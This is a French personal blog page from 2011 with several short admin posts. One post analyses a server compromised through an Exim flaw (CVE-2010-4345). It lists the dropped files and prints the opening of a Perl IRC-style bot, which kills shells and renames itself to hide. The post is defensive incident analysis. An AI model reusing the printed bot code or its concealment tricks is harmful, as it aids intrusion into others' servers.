Mardi 17 mai 2011 2 17 /05 /Mai /2011 16:39

C'est bien connu, les sites webs disposent rarement de contenus statiques comme des css, des images, des javascripts... Alors les crânes d'oeuf de Krosoft ont eu une idée géniale : la version 7.5 de IIS ne servira pas les contenus statiques par défaut :

 

iis75_static.png

Par admin - Publié dans : Développement
Ecrire un commentaire - Voir les 1 commentaires
Vendredi 13 mai 2011 5 13 /05 /Mai /2011 14:02

Il s'agit de l'exploitation de la faille http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4345 . Un email spécifiquement forgé force Exim à exécuter un shell script qui dépose un petit cadeau sur votre serveur. Il permet à l'utilisateur sous lequel tourne Exim de prendre les droits de root, rien que ça :

 

Petit état des lieux :

~$ ls /tmp -la
total 5328
drwx------ 3 Debian-exim Debian-exim 29 May 6 01:15 .mc-root
-rw------- 1 Debian-exim Debian-exim 0 May 6 00:23 d
-rwx------ 1 Debian-exim Debian-exim 12096 May 6 00:22 nu
-rw------- 1 Debian-exim Debian-exim 3507 Jan 4 04:40 nu.c

 

Dans le répertoire .mc-root, se trouve ceci :

~$ sudo ls /tmp/.mc-root/ -la
total 8
drwx------ 3 Debian-exim Debian-exim 29 May 6 01:15 .
drwxrwxrwx 5 root root 134 May 13 14:24 ..
drwx------ 2 Debian-exim Debian-exim 110 May 6 01:15 bash
-rw------- 1 Debian-exim Debian-exim 5680 May 6 01:14 d.gif

 

 

Un fichier d.gif qui est en réalité une archive tar.gz qui contient ce qui a été décompressé dans le répertoire bash :

 

~$ sudo ls /tmp/.mc-root/bash -la
total 44
drwx------ 2 Debian-exim Debian-exim 110 May 6 01:15 .
drwx------ 3 Debian-exim Debian-exim 29 May 6 01:15 ..
-rwx------ 1 Debian-exim Debian-exim 332 Mar 20 21:21 autorun
-rw------- 1 Debian-exim Debian-exim 52 May 6 02:12 cron.d
-rwx------ 1 Debian-exim Debian-exim 76 Mar 20 21:50 pid
-rwx------ 1 Debian-exim Debian-exim 43 Mar 20 21:21 run
-rwx------ 1 Debian-exim Debian-exim 190 May 6 02:12 update
-rw------- 1 Debian-exim Debian-exim 19 May 6 02:12 w0rm.dir
-rw------- 1 Debian-exim Debian-exim 6 May 10 16:06 w0rm.pid
-rw------- 1 Debian-exim Debian-exim 16051 May 6 01:09 w0rm.pl

 

 

 

L'objectif est d'exécuter le script Perl w0rm.pl, dont voici le début :

 

#!/usr/bin/perl
# ----------------------------------------------------------- #
# ilegalbrain PerlBot #
# ----------------------------------------------------------- #
system("kill -9 `ps ax |grep -bash |grep -v grep|awk '{print $1;}'`");

system("echo `ps ax |grep /usr/sbin/test |grep -v grep|awk '{print $1;}'` >w0rm.pid");
system("./pid");

my $processo = '/usr/sbin/test';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];
...

 

Le processus se forke dès le début pour tourner sous un nom plus discret /usr/bin/test et sous le compte de Exim (104) :

 


$ ps aux |grep test
root 10054 0.0 0.0 9776 840 pts/3 R+ 14:48 0:00 grep test
104 29336 0.0 0.1 33016 3656 ? S May10 0:06 /usr/sbin/test
104 29400 0.0 0.1 33016 3656 ? S May10 0:02 /usr/sbin/test

Par admin - Publié dans : Sécurité
Ecrire un commentaire - Voir les 0 commentaires
Dimanche 1 mai 2011 7 01 /05 /Mai /2011 09:12

Vous avez déjà une licence Windows ou vous ne souhaitez pas utiliser ce logiciel ? Certains constructeurs (rares) proposent de rembourser : bons constructeurs (AFUL)

 

Ce que je fis dès la réception de ma nouvelle machine Asus, avec décollage au sèche-cheveux de la licence située dessous !

 

Réception environ un mois après des 43€ correspondant à la licence Windows 7 Family.

 

C'est super ! Ca serait encore mieux si on avait la possibilité de ne pas avoir de démarche à faire (optionnalité)...

 

Par admin - Publié dans : Société
Ecrire un commentaire - Voir les 0 commentaires
Mardi 29 mars 2011 2 29 /03 /Mars /2011 13:37

Le BTS IG vit ses derniers moments. Le BTS SIO (Services Informatiques aux Organisations) le remplace avec un nouveau programme et de nouvelles modalités. Une des principales nouveautés est la spécialisation à partir du deuxième semestre de la première année, ce qui permet un approfondissement plus important dans le réseau ou le développement.

 

Tous les détails : ici

Par admin
Ecrire un commentaire - Voir les 0 commentaires
Mardi 29 mars 2011 2 29 /03 /Mars /2011 09:35

Après un su, impossible de lancer une commande X :

 

$ su - toto

Mot de passe :
toto@ubuntu:~$ xclock
No protocol specified
Error: Can't open display: :0.0

 

Il faut autoriser les connexions locales. En root :

 

# xhost local:toto
non-network local connections being added to access control list

 

Ce droit peut être retiré :

 

$ xhost -local:toto
non-network local connections being removed from access control list

Par admin - Publié dans : Services réseau
Ecrire un commentaire - Voir les 0 commentaires

Recherche

Calendrier

Janvier 2012
L M M J V S D
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          
<< < > >>
Créer un blog gratuit sur over-blog.com - Contact - C.G.U. - Rémunération en droits d'auteur - Signaler un abus